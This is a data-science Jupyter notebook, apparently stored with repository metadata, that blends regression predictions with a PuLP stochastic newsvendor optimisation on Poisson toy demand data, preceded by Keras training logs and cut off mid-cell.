0.6400 - val_loss: 0.6813\nEpoch 16/100\n7740/7740 [==============================] - 0s 56us/sample - loss: 0.6324 - val_loss: 0.6724\nEpoch 17/100\n7740/7740 [==============================] - 1s 70us/sample - loss: 0.6255 - val_loss: 0.6645\nEpoch 18/100\n7740/7740 [==============================] - 0s 52us/sample - loss: 0.6189 - val_loss: 0.6571\nEpoch 19/100\n7740/7740 [==============================] - 0s 58us/sample - loss: 0.6128 - val_loss: 0.6504\nEpoch 20/100\n7740/7740 [==============================] - 0s 49us/sample - loss: 0.6072 - val_loss: 0.6440\nEpoch 21/100\n7740/7740 [==============================] - 0s 57us/sample - loss: 0.6018 - val_loss: 0.6379\nEpoch 22/100\n7740/7740 [==============================] - 1s 66us/sample - loss: 0.5969 - val_loss: 0.6322\nEpoch 23/100\n7740/7740 [==============================] - 1s 75us/sample - loss: 0.5922 - val_loss: 0.6269\nEpoch 24/100\n7740/7740 [==============================] - 0s 61us/sample - loss: 0.5878 - val_loss: 0.6220\nEpoch 25/100\n7740/7740 [==============================] - 1s 81us/sample - loss: 0.5837 - val_loss: 0.6171\nEpoch 26/100\n7740/7740 [==============================] - 1s 71us/sample - loss: 0.5798 - val_loss: 0.6129\nEpoch 27/100\n7740/7740 [==============================] - 0s 57us/sample - loss: 0.5761 - val_loss: 0.6090\nEpoch 28/100\n7740/7740 [==============================] - 1s 71us/sample - loss: 0.5723 - val_loss: 0.6048\nEpoch 29/100\n7740/7740 [==============================] - 0s 63us/sample - loss: 0.5689 - val_loss: 0.6012\nEpoch 30/100\n7740/7740 [==============================] - 0s 55us/sample - loss: 0.5655 - val_loss: 0.5974\nEpoch 31/100\n7740/7740 [==============================] - 0s 61us/sample - loss: 0.5624 - val_loss: 0.5941\nEpoch 32/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5594 - val_loss: 0.5911\nEpoch 33/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.5565 - val_loss: 0.5878\nEpoch 34/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5537 - val_loss: 0.5845\nEpoch 35/100\n7740/7740 [==============================] - 0s 54us/sample - loss: 0.5512 - val_loss: 0.5815\nEpoch 36/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5486 - val_loss: 0.5791\nEpoch 37/100\n7740/7740 [==============================] - 0s 49us/sample - loss: 0.5462 - val_loss: 0.5764\nEpoch 38/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5438 - val_loss: 0.5738\nEpoch 39/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.5414 - val_loss: 0.5714\nEpoch 40/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5393 - val_loss: 0.5688\nEpoch 41/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5369 - val_loss: 0.5660\nEpoch 42/100\n7740/7740 [==============================] - 0s 49us/sample - loss: 0.5349 - val_loss: 0.5640\nEpoch 43/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5329 - val_loss: 0.5617\nEpoch 44/100\n7740/7740 [==============================] - 0s 49us/sample - loss: 0.5309 - val_loss: 0.5595\nEpoch 45/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5288 - val_loss: 0.5569\nEpoch 46/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.5270 - val_loss: 0.5548\nEpoch 47/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5251 - val_loss: 0.5528\nEpoch 48/100\n7740/7740 [==============================] - 0s 53us/sample - loss: 0.5232 - val_loss: 0.5505\nEpoch 49/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5214 - val_loss: 0.5484\nEpoch 50/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5197 - val_loss: 0.5464\nEpoch 51/100\n7740/7740 [==============================] - 0s 52us/sample - loss: 0.5179 - val_loss: 0.5446\nEpoch 52/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5163 - val_loss: 0.5427\nEpoch 53/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.5147 - val_loss: 0.5411\n3870/3870 [==============================] - 0s 23us/sample - loss: 0.4830\n7740/7740 [==============================] - 0s 21us/sample - loss: 0.5133\nTrain on 7740 samples, validate on 3870 samples\nEpoch 1/100\n7740/7740 [==============================] - 1s 81us/sample - loss: 4.2068 - val_loss: 2.5104\nEpoch 2/100\n7740/7740 [==============================] - 0s 52us/sample - loss: 1.8832 - val_loss: 1.3657\nEpoch 3/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 1.1896 - val_loss: 1.0111\nEpoch 4/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.9359 - val_loss: 0.8763\nEpoch 5/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.8307 - val_loss: 0.8143\nEpoch 6/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.7718 - val_loss: 0.7787\nEpoch 7/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.7348 - val_loss: 0.7573\nEpoch 8/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.7100 - val_loss: 0.7430\nEpoch 9/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6919 - val_loss: 0.7322\nEpoch 10/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.6778 - val_loss: 0.7231\nEpoch 11/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6661 - val_loss: 0.7149\nEpoch 12/100\n7740/7740 [==============================] - 0s 49us/sample - loss: 0.6561 - val_loss: 0.7075\nEpoch 13/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6473 - val_loss: 0.7005\nEpoch 14/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6393 - val_loss: 0.6936\nEpoch 15/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6320 - val_loss: 0.6872\nEpoch 16/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.6253 - val_loss: 0.6810\nEpoch 17/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6189 - val_loss: 0.6747\nEpoch 18/100\n7740/7740 [==============================] - 0s 56us/sample - loss: 0.6129 - val_loss: 0.6690\nEpoch 19/100\n7740/7740 [==============================] - 0s 51us/sample - loss: 0.6072 - val_loss: 0.6634\nEpoch 20/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.6018 - val_loss: 0.6576\nEpoch 21/100\n7740/7740 [==============================] - 0s 53us/sample - loss: 0.5965 - val_loss: 0.6522\nEpoch 22/100\n" ], [ "print(random_search_cv.best_params_)\nprint(random_search_cv.best_score_)\nprint(random_search_cv.best_estimator_)", "{'hidden_layers': 4, 'layer_size': 44, 'learning_rate': 0.0009577195482517434}\n-0.38287415603026553\n<keras.wrappers.scikit_learn.KerasRegressor object at 0x138dbc080>\n" ], [ "model = random_search_cv.best_estimator_.model\nmodel.evaluate(x_test_scaled, y_test)", "5160/5160 [==============================] - 0s 30us/sample - loss: 0.3790\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e730708e263901cc89e0d735b8e48787de6ff594
212,127
ipynb
Jupyter Notebook
misc - work/stochastic_ml_blend.ipynb
jkapila/paper-codebase
35198a924b66299cab0bf405d4f5ab54ca504be9
[ "BSD-3-Clause" ]
null
null
null
misc - work/stochastic_ml_blend.ipynb
jkapila/paper-codebase
35198a924b66299cab0bf405d4f5ab54ca504be9
[ "BSD-3-Clause" ]
null
null
null
misc - work/stochastic_ml_blend.ipynb
jkapila/paper-codebase
35198a924b66299cab0bf405d4f5ab54ca504be9
[ "BSD-3-Clause" ]
null
null
null
88.423093
43,816
0.776634
[ [ [ "### 1) GET LIBRARY", "_____no_output_____" ] ], [ [ "import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import LinearRegression\nimport pandas as pd", "_____no_output_____" ] ], [ [ "### 2) GENERATE DATA", "_____no_output_____" ] ], [ [ "np.random.seed(1234)", "_____no_output_____" ], [ "def generate_toy_data(n, lam, a, b):\n '''Generate random number from poisson distribution.\n Input:\n n = number of data points to generate\n lam = lambda of the poisson distribution\n a, b = any positive coefficient (since we want to simulate demand) \n \n Output:\n x = independent variable\n y = demand for toy data that results from a*x + b, with x ~ poisson(lam)\n '''\n x = np.random.poisson(lam, n)\n x = x.reshape((-1,1))\n \n y = a*x + b\n y = y.reshape((-1,1))\n y = y.astype(int)\n \n return x, y", "_____no_output_____" ], [ "# generate toy data\nx, y = generate_toy_data(1000, 100, 0.25, 2)\n\n# visualize toy data\nplt.figure()\nsns.distplot(y)\nplt.show()", "_____no_output_____" ], [ "# visualize toy data x\nplt.figure()\nsns.distplot(x)\nplt.show()", "_____no_output_____" ], [ "plt.figure()\nplt.scatter(x, y)\nplt.show()", "_____no_output_____" ] ], [ [ "### 3) IMPLEMENT SIMPLE PREDICTION", "_____no_output_____" ] ], [ [ "# split data to training and testing set\ntrain_x, test_x, train_y, test_y = train_test_split(x, y, test_size=0.2)", "_____no_output_____" ], [ "df_train = pd.DataFrame({'train_x': train_x.flatten(), 'train_y': train_y.flatten()})\ndf_test = pd.DataFrame({'test_x': test_x.flatten(), 'test_y': test_y.flatten()})", "_____no_output_____" ] ], [ [ "#### a) RANDOM FOREST", "_____no_output_____" ] ], [ [ "rf = RandomForestRegressor(n_estimators = 1000, random_state = 42)\nrf.fit(train_x, train_y)", "C:\\Users\\jkapila\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\ipykernel_launcher.py:2: DataConversionWarning: A column-vector y was passed when a 1d array was expected. Please change the shape of y to (n_samples,), for example using ravel().\n \n" ], [ "test_y_rfpred = (rf.predict(test_x)).astype(int)\nerr_rf = abs(test_y_rfpred - test_y)\nprint('Mean Absolute Error:', round(np.mean(err_rf), 2), 'degrees.')", "Mean Absolute Error: 3.05 degrees.\n" ] ], [ [ "#### b) LINEAR REGRESSION", "_____no_output_____" ] ], [ [ "lr = LinearRegression()\nlr.fit(train_x, train_y)", "_____no_output_____" ], [ "test_y_lrpred = (rf.predict(test_x)).astype(int)\nerr_lr = abs(test_y_lrpred - test_y)\nprint('Mean Absolute Error:', round(np.mean(err_lr), 2), 'degrees.')", "Mean Absolute Error: 3.05 degrees.\n" ], [ "# check coefficient\nprint(lr.coef_)\nprint(lr.intercept_)", "[[0.25079062]]\n[1.54812364]\n" ] ], [ [ "#### c) SUMMARIZE RESULT & CHECK GRAPH (RANDOM FOREST & LINREG)", "_____no_output_____" ] ], [ [ "df_summ = pd.DataFrame({'test_x': test_x.flatten(),\n 'test_y': test_y.flatten(), \n 'test_y_rfpred': test_y_rfpred.flatten(), \n 'test_y_lrpred': test_y_lrpred.flatten()})\ndf_summ['diff_rf_actual'] = df_summ['test_y_rfpred'] - df_summ['test_y']\ndf_summ['diff_lr_actual'] = df_summ['test_y_lrpred'] - df_summ['test_y']\n\n# toy data is simple, hence prediction is rather powerful as we only have few missed prediction\n# even so, in this kind of cases:\n# --> we will lose potential profit if prediction < demand\n# --> we will incur unnecessary cost if prediction > demand as we cannot sell the remaining goods at selling price \ndf_summ[(df_summ['diff_rf_actual'] != 0) | (df_summ['diff_lr_actual'] != 0)] ", "_____no_output_____" ], [ "plt.figure()\n\ncomponents = [test_y, test_y_rfpred, test_y_lrpred]\nlabels=['test_y', 'test_y_rfpred', 'test_y_lrpred']\n\nfig, axes = plt.subplots(1)\nfor component in components:\n sns.distplot(component)\n\naxes.legend(labels=labels) \nplt.show()", "_____no_output_____" ] ], [ [ "### 4) STOCHASTIC PROGRAMMING\n#### a) DISCRETIZING DEMAND: TO CAPTURE PROBABILITY OF EACH POSSIBLE SCENARIO", "_____no_output_____" ] ], [ [ "# capturing probability of each possible scenario can be done in many ways, \n# ranging from simple descriptive analytics to more complicated things like\n# moment matching, monte carlo simulation, etc.\n# we do the easiest here: do clustering to generate scenario (max 100 scenario for now)\n\nfrom sklearn.cluster import KMeans", "_____no_output_____" ], [ "def cluster_1d(df, max_cluster=100):\n '''Cluster data into n different cluster where n is the minimum between unique scenario and max_cluster.\n Input:\n df = dataframe column containing scenario to cluster\n max_cluster = number of maximum cluster we want to have (default=100)\n \n Output:\n cluster_centers_df = mapping between cluster labels and its centers\n cluster_labels_df = mapping between df and its cluster labels \n '''\n km = KMeans(n_clusters=min(len(df.unique()),max_cluster))\n km.fit(df.values.reshape(-1,1)) \n \n # get information about center\n centers = np.array(km.cluster_centers_.reshape(1,-1)[0].tolist())\n cluster_centers_df = pd.DataFrame({'cluster_centers':centers,'labels':range(len(centers))})\n# cluster_centers_df.columns = ['cluster_centers']\n# cluster_centers_df['labels'] = range(cluster_centers_df.count())\n \n # get information about labels and add information about center\n cluster_labels_df = pd.DataFrame(np.array(km.labels_))\n cluster_labels_df.columns = ['labels']\n cluster_labels_df = pd.concat([df.reset_index(drop=True), cluster_labels_df], axis=1)\n cluster_labels_df = pd.merge(cluster_labels_df, cluster_centers_df, on='labels', how='left')\n \n return cluster_centers_df, cluster_labels_df", "_____no_output_____" ], [ "def cluster_summ(df):\n '''Summarize probability for each scenario by referring to result from cluster_1d.\n Input:\n df = dataframe column containing scenario to cluster\n \n Output:\n cluster_proportion_df = dataframe containing complete information about probability for each scenario\n demand = possible scenario to happen\n weight = probability of the possible scenario to happen\n scenarios = indexing for demand\n '''\n cluster_centers_df, cluster_labels_df = cluster_1d(df)\n print(cluster_centers_df.head())\n print(cluster_labels_df.head())\n\n count_label = cluster_labels_df[['labels']].count().values[0]\n cluster_proportion_df = cluster_labels_df[['cluster_centers', 'labels']].groupby('cluster_centers').count().reset_index(drop=False)\n cluster_proportion_df['count_labels'] = count_label\n cluster_proportion_df['proportion_labels'] = cluster_proportion_df['labels'] / cluster_proportion_df['count_labels']\n cluster_proportion_df['index'] = range(1,cluster_proportion_df.shape[0] + 1)\n cluster_proportion_df['cluster_centers'] = np.round(cluster_proportion_df['cluster_centers'], decimals=(3))\n \n demand = pd.Series(cluster_proportion_df['cluster_centers'].values, index=cluster_proportion_df['index'].values).to_dict()\n weight = pd.Series(cluster_proportion_df['proportion_labels'].values, index=cluster_proportion_df['index'].values).to_dict()\n scenarios = range(1,len(cluster_proportion_df.cluster_centers.values)+1)\n \n return cluster_proportion_df, demand, weight, scenarios", "_____no_output_____" ], [ "cluster_proportion_df, demand, weight, scenarios = cluster_summ(df=df_train['train_y'])\n\nprint('\\nValues wee need to see : ',demand)\nprint('\\nOccurences of values : ',weight)\nprint('\\nNumber osf scenarios(Values): ',scenarios)", " cluster_centers labels\n0 27.0 0\n1 24.0 1\n2 29.0 2\n3 30.0 3\n4 26.0 4\n train_y labels cluster_centers\n0 27 0 27.0\n1 26 4 26.0\n2 24 1 24.0\n3 31 9 31.0\n4 30 3 30.0\n\nValues wee need to see : {1: 19.0, 2: 20.0, 3: 21.0, 4: 22.0, 5: 23.0, 6: 24.0, 7: 25.0, 8: 26.0, 9: 27.0, 10: 28.0, 11: 29.0, 12: 30.0, 13: 31.0, 14: 32.0, 15: 33.0, 16: 34.0}\n\nOccurences of values : {1: 0.00125, 2: 0.00625, 3: 0.0125, 4: 0.04, 5: 0.065, 6: 0.09375, 7: 0.1175, 8: 0.17125, 9: 0.13875, 10: 0.1275, 11: 0.09, 12: 0.0825, 13: 0.0325, 14: 0.01, 15: 0.00875, 16: 0.0025}\n\nNumber osf scenarios(Values): range(1, 17)\n" ], [ "cluster_proportion_df.head()", "_____no_output_____" ], [ "cluster_proportion_df", "_____no_output_____" ], [ "19.0/800", "_____no_output_____" ], [ "sum([i[1] for i in weight.items()])", "_____no_output_____" ] ], [ [ "#### b) USING PULP TO SOLVE STOCHASTIC PROGRAMMING", "_____no_output_____" ] ], [ [ "# !pip install pulp pygmo deap", "Requirement already satisfied: pulp in c:\\users\\jkapila\\appdata\\local\\continuum\\anaconda3\\lib\\site-packages (2.1)\nRequirement already satisfied: pygmo in c:\\users\\jkapila\\appdata\\local\\continuum\\anaconda3\\lib\\site-packages (2.13.0)\nRequirement already satisfied: deap in c:\\users\\jkapila\\appdata\\local\\continuum\\anaconda3\\lib\\site-packages (1.3.1)\nRequirement already satisfied: pyparsing>=2.0.1 in c:\\users\\jkapila\\appdata\\local\\continuum\\anaconda3\\lib\\site-packages (from pulp) (2.4.0)\nRequirement already satisfied: numpy in c:\\users\\jkapila\\appdata\\local\\continuum\\anaconda3\\lib\\site-packages (from pygmo) (1.16.4)\nRequirement already satisfied: cloudpickle in c:\\users\\jkapila\\appdata\\local\\continuum\\anaconda3\\lib\\site-packages (from pygmo) (1.2.1)\n" ], [ "from pulp import *\n\nN = 100 # maximum item to purchase\ncost_price = 20 # amount paid to the supplier\nsell_price = 21 # amount paid by the customer\nwaste_price = 0 # amount paid if we sell the remaining goods (ie. when we have more stock as prediction > demand)", "_____no_output_____" ], [ "##########################################\n# DEFINE VARIABLES\n##########################################\n\n# Defining our problem statement \nM = LpProblem(\"Newsvendor1\", LpMaximize)\n\n# Defining the variable which needs to be optimized\nx = LpVariable('x', lowBound=0)\n\n# Defining the scenarios / value demamds / clusterd y values\nz = LpVariable.dicts('z', scenarios, 0)\n\nprint('Problem Statement: ',M)\nprint('X variable: ',x)\nprint('Z variable: ',z)\n\n##########################################\n# DEFINE MODELS: CONSTRAINTS\n##########################################\n\nfor i in scenarios:\n print(demand[i])\n print(weight[i])\n M += x <= N # the maximum value our independent varaible can have for a scenario\n M += z[i] <= x # telling the scenario cannot have more casses than its occurence\n M += z[i] <= demand[i] # defining the upper limit of values a scenario can attain\n\nprint('Problem Statement with constraints: ', M)\nprint('X variable: ', x)\nprint('Z variable: ', z)\n \n##########################################\n# DEFINE MODELS: OBJECTIVE\n##########################################\n\nM += sum(weight[i] * (sell_price * z[i] + waste_price * (x - z[i])) for i in scenarios) - (cost_price * x) \n\nprint('Problem Statement with constraints and solution points: ',M)\nM.solve()\n", "Problem Statement: Newsvendor1:\nMAXIMIZE\nNone\nVARIABLES\n\nX variable: x\nZ variable: {1: z_1, 2: z_2, 3: z_3, 4: z_4, 5: z_5, 6: z_6, 7: z_7, 8: z_8, 9: z_9, 10: z_10, 11: z_11, 12: z_12, 13: z_13, 14: z_14, 15: z_15, 16: z_16}\n19.0\n0.00125\n20.0\n0.00625\n21.0\n0.0125\n22.0\n0.04\n23.0\n0.065\n24.0\n0.09375\n25.0\n0.1175\n26.0\n0.17125\n27.0\n0.13875\n28.0\n0.1275\n29.0\n0.09\n30.0\n0.0825\n31.0\n0.0325\n32.0\n0.01\n33.0\n0.00875\n34.0\n0.0025\nProblem Statement with constraints: Newsvendor1:\nMAXIMIZE\nNone\nSUBJECT TO\n_C1: x <= 100\n\n_C2: - x + z_1 <= 0\n\n_C3: z_1 <= 19\n\n_C4: x <= 100\n\n_C5: - x + z_2 <= 0\n\n_C6: z_2 <= 20\n\n_C7: x <= 100\n\n_C8: - x + z_3 <= 0\n\n_C9: z_3 <= 21\n\n_C10: x <= 100\n\n_C11: - x + z_4 <= 0\n\n_C12: z_4 <= 22\n\n_C13: x <= 100\n\n_C14: - x + z_5 <= 0\n\n_C15: z_5 <= 23\n\n_C16: x <= 100\n\n_C17: - x + z_6 <= 0\n\n_C18: z_6 <= 24\n\n_C19: x <= 100\n\n_C20: - x + z_7 <= 0\n\n_C21: z_7 <= 25\n\n_C22: x <= 100\n\n_C23: - x + z_8 <= 0\n\n_C24: z_8 <= 26\n\n_C25: x <= 100\n\n_C26: - x + z_9 <= 0\n\n_C27: z_9 <= 27\n\n_C28: x <= 100\n\n_C29: - x + z_10 <= 0\n\n_C30: z_10 <= 28\n\n_C31: x <= 100\n\n_C32: - x + z_11 <= 0\n\n_C33: z_11 <= 29\n\n_C34: x <= 100\n\n_C35: - x + z_12 <= 0\n\n_C36: z_12 <= 30\n\n_C37: x <= 100\n\n_C38: - x + z_13 <= 0\n\n_C39: z_13 <= 31\n\n_C40: x <= 100\n\n_C41: - x + z_14 <= 0\n\n_C42: z_14 <= 32\n\n_C43: x <= 100\n\n_C44: - x + z_15 <= 0\n\n_C45: z_15 <= 33\n\n_C46: x <= 100\n\n_C47: - x + z_16 <= 0\n\n_C48: z_16 <= 34\n\nVARIABLES\nx Continuous\nz_1 Continuous\nz_10 Continuous\nz_11 Continuous\nz_12 Continuous\nz_13 Continuous\nz_14 Continuous\nz_15 Continuous\nz_16 Continuous\nz_2 Continuous\nz_3 Continuous\nz_4 Continuous\nz_5 Continuous\nz_6 Continuous\nz_7 Continuous\nz_8 Continuous\nz_9 Continuous\n\nX variable: x\nZ variable: {1: z_1, 2: z_2, 3: z_3, 4: z_4, 5: z_5, 6: z_6, 7: z_7, 8: z_8, 9: z_9, 10: z_10, 11: z_11, 12: z_12, 13: z_13, 14: z_14, 15: z_15, 16: z_16}\nProblem Statement with constraints and solution points: Newsvendor1:\nMAXIMIZE\n-20*x + 0.02625*z_1 + 2.6775*z_10 + 1.89*z_11 + 1.7325000000000002*z_12 + 0.6825*z_13 + 0.21*z_14 + 0.18375000000000002*z_15 + 0.0525*z_16 + 0.13125*z_2 + 0.2625*z_3 + 0.84*z_4 + 1.365*z_5 + 1.96875*z_6 + 2.4675*z_7 + 3.5962500000000004*z_8 + 2.9137500000000003*z_9 + 0.0\nSUBJECT TO\n_C1: x <= 100\n\n_C2: - x + z_1 <= 0\n\n_C3: z_1 <= 19\n\n_C4: x <= 100\n\n_C5: - x + z_2 <= 0\n\n_C6: z_2 <= 20\n\n_C7: x <= 100\n\n_C8: - x + z_3 <= 0\n\n_C9: z_3 <= 21\n\n_C10: x <= 100\n\n_C11: - x + z_4 <= 0\n\n_C12: z_4 <= 22\n\n_C13: x <= 100\n\n_C14: - x + z_5 <= 0\n\n_C15: z_5 <= 23\n\n_C16: x <= 100\n\n_C17: - x + z_6 <= 0\n\n_C18: z_6 <= 24\n\n_C19: x <= 100\n\n_C20: - x + z_7 <= 0\n\n_C21: z_7 <= 25\n\n_C22: x <= 100\n\n_C23: - x + z_8 <= 0\n\n_C24: z_8 <= 26\n\n_C25: x <= 100\n\n_C26: - x + z_9 <= 0\n\n_C27: z_9 <= 27\n\n_C28: x <= 100\n\n_C29: - x + z_10 <= 0\n\n_C30: z_10 <= 28\n\n_C31: x <= 100\n\n_C32: - x + z_11 <= 0\n\n_C33: z_11 <= 29\n\n_C34: x <= 100\n\n_C35: - x + z_12 <= 0\n\n_C36: z_12 <= 30\n\n_C37: x <= 100\n\n_C38: - x + z_13 <= 0\n\n_C39: z_13 <= 31\n\n_C40: x <= 100\n\n_C41: - x + z_14 <= 0\n\n_C42: z_14 <= 32\n\n_C43: x <= 100\n\n_C44: - x + z_15 <= 0\n\n_C45: z_15 <= 33\n\n_C46: x <= 100\n\n_C47: - x + z_16 <= 0\n\n_C48: z_16 <= 34\n\nVARIABLES\nx Continuous\nz_1 Continuous\nz_10 Continuous\nz_11 Continuous\nz_12 Continuous\nz_13 Continuous\nz_14 Continuous\nz_15 Continuous\nz_16 Continuous\nz_2 Continuous\nz_3 Continuous\nz_4 Continuous\nz_5 Continuous\nz_6 Continuous\nz_7 Continuous\nz_8 Continuous\nz_9 Continuous\n\n" ], [ "##########################################\n# PRINT RESULTS\n##########################################\n\nprint(\"Status = %s\" % LpStatus[M.status])\n\nprint(\"%s = %f\" % (x.name, x.varValue))\nfor i in scenarios:\n print(\"%s = %f\" % (z[i].name, z[i].varValue))\nprint(\"Objective = %f\" % (M.objective.value()))", "Status = Optimal\nx = 22.000000\nz_1 = 19.000000\nz_2 = 20.000000\nz_3 = 21.000000\nz_4 = 22.000000\nz_5 = 22.000000\nz_6 = 22.000000\nz_7 = 22.000000\nz_8 = 22.000000\nz_9 = 22.000000\nz_10 = 22.000000\nz_11 = 22.000000\nz_12 = 22.000000\nz_13 = 22.000000\nz_14 = 22.000000\nz_15 = 22.000000\nz_16 = 22.000000\nObjective = 21.396250\n" ] ], [ [ "#### c) CHECK AS TABLE (MANUAL CALCULATION): TO SEE CLEARLY WHAT HAPPENS", "_____no_output_____" ] ], [ [ "def result_summ(cluster_proportion_df, demand, weight, sell_price, cost_price, waste_price):\n '''Summarize result by comparing possible scenario (example_df) with its possible execution (purchase_df).\n We want to look how much profit we can get given a pair of scenario and its execution, \n weighted with the probability of each scenario to happen.\n Input:\n cluster_proportion_df = dataframe containing complete information about probability for each scenario\n demand = possible scenario to happen\n weight = probability of the possible scenario to happen\n cost_price = amount paid to the supplier\n sell_price = amount paid by the customer\n waste_price = amount paid if we sell the remaining goods\n\n Output:\n example_df = dataframe after cross join between possible scenario and possible execution\n example_df_summ = summary of example_df to obtain total expected profit per possible execution\n '''\n \n # get the basic df: purchase_df for the demand and example_df for the possible scenario execution\n purchase_df = pd.DataFrame({'key': 0, 'item_to_purchase': demand})\n example_df = pd.DataFrame({'key': 0, 'item_to_sell': cluster_proportion_df['cluster_centers'], \n 'probability': cluster_proportion_df['proportion_labels']})\n example_df = example_df.merge(purchase_df, on='key', how='outer')\n example_df = example_df.drop('key', axis=1).sort_values(['item_to_purchase', 'item_to_sell'])\n \n example_df['total_revenue'] = example_df[['item_to_sell', 'item_to_purchase']].min(axis=1) * sell_price\n example_df['total_cost'] = example_df['item_to_purchase'] * cost_price\n example_df['total_profit'] = (example_df['total_revenue'] - example_df['total_cost'])\n \n example_df['total_weighted_profit'] = example_df['probability'] * example_df['total_profit']\n example_df['total_cumsum_profit'] = example_df.groupby('item_to_purchase')['total_weighted_profit'].cumsum()\n\n example_df_summ = example_df.groupby('item_to_purchase', as_index=False)['total_weighted_profit'].sum()\n \n return example_df, example_df_summ", "_____no_output_____" ], [ "example_df, example_df_summ = result_summ(cluster_proportion_df=cluster_proportion_df, demand=demand, weight=weight, \n sell_price=sell_price, cost_price=cost_price, waste_price=waste_price)\nexample_df", "_____no_output_____" ] ], [ [ "#### d) VISUAL CHECK", "_____no_output_____" ] ], [ [ "# limit the table, we don't want to be overwhelmed\ntemp = example_df[(example_df['item_to_purchase'] >= 20) & (example_df['item_to_purchase'] <= 25)]\ntemp.loc[:,'item_to_purchase'] = temp['item_to_purchase'].astype('str')", "C:\\Users\\jkapila\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexing.py:494: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n self.obj[item] = s\n" ], [ "# check the weighted profit per possible scenario: \n# we can see how higher execution causes greater loss during weak demand and hence,\n# higher execution number has difficulty in bouncing the profit up \n\nfig, ax = plt.subplots()\n\nfor i in temp['item_to_purchase'].unique():\n temp[temp['item_to_purchase'] == i].plot.line(x='item_to_purchase', y='total_weighted_profit', ax=ax, label=str(i))\nplt.xticks(range(0,np.unique(temp['item_to_sell']).shape[0]),np.unique(temp['item_to_sell']),rotation=45)\nplt.show()", "_____no_output_____" ], [ "# check the total expected profit, which comes from all possible profit \n# and weighted by the probability of the scenario to happen\nplt.figure()\nsns.scatterplot(x='item_to_purchase', y='total_weighted_profit', data=example_df_summ)\nplt.show()", "_____no_output_____" ] ], [ [ "### 5) PREDICTION + STOCHASTIC PROGRAMMING\n#### a) BOOTSTRAPPING", "_____no_output_____" ] ], [ [ "size_bstrap = 50\niter = 100\nidx_check = 172\ntest_y_bstrap = []\ncoef_bstrap = []\nintercept_bstrap = []\n\nfor i in range(iter):\n \n # sampling with replacement\n idx = np.random.choice(np.arange(0,train_x.shape[0]), size_bstrap, replace=True)\n train_x_temp = train_x[idx]\n train_y_temp = train_y[idx]\n \n # do linear regression\n lr_bstrap = LinearRegression()\n lr_bstrap.fit(train_x_temp, train_y_temp)\n \n # get coefficient and intercept\n coef_bstrap.append(lr_bstrap.coef_)\n intercept_bstrap.append(lr_bstrap.intercept_)\n \n # get result, only for intended index idx_check\n # test_y_bstrap.append((lr_bstrap.predict(test_x)[idx_check][0]).astype(int))\n result_temp = np.rint(lr_bstrap.intercept_ + lr_bstrap.coef_ * test_x[idx_check])[0,0]\n test_y_bstrap.append(result_temp)\n ", "_____no_output_____" ], [ "result_bstrap = pd.DataFrame({'test_y_bstrap': test_y_bstrap})\nresult_bstrap['test_x_bstrap'] = test_x[idx_check][0]\nresult_bstrap", "_____no_output_____" ], [ "result_bstrap_summ = result_bstrap.groupby('test_y_bstrap').count().reset_index(drop=False)\nresult_bstrap_summ", "_____no_output_____" ] ], [ [ "#### b) DISCRETIZING DEMAND", "_____no_output_____" ] ], [ [ "cluster_proportion_df_bstrap, demand_bstrap, weight_bstrap, scenarios_bstrap = cluster_summ(df=result_bstrap['test_y_bstrap'])\n\nprint(demand_bstrap)\nprint(weight_bstrap)\nprint(scenarios_bstrap)", "{1: 26.0}\n{1: 1.0}\nrange(1, 2)\n" ] ], [ [ "#### c) USING PULP TO SOLVE STOCHASTIC PROGRAMMING", "_____no_output_____" ] ], [ [ "##########################################\n# DEFINE VARIABLES\n##########################################\n\nM_bstrap = LpProblem(\"Newsvendor2\", LpMaximize)\n\nx_bstrap = LpVariable('x_bstrap', lowBound=0)\nz_bstrap = LpVariable.dicts('z_bstrap', scenarios_bstrap, 0)\n\n\n##########################################\n# DEFINE MODELS: CONSTRAINTS\n##########################################\n\nfor i in scenarios_bstrap:\n print(demand_bstrap[i])\n print(weight_bstrap[i])\n M_bstrap += x_bstrap <= N\n M_bstrap += z_bstrap[i] <= x_bstrap\n M_bstrap += z_bstrap[i] <= demand_bstrap[i]\n\n \n##########################################\n# DEFINE MODELS: OBJECTIVE\n##########################################\n\nM_bstrap += 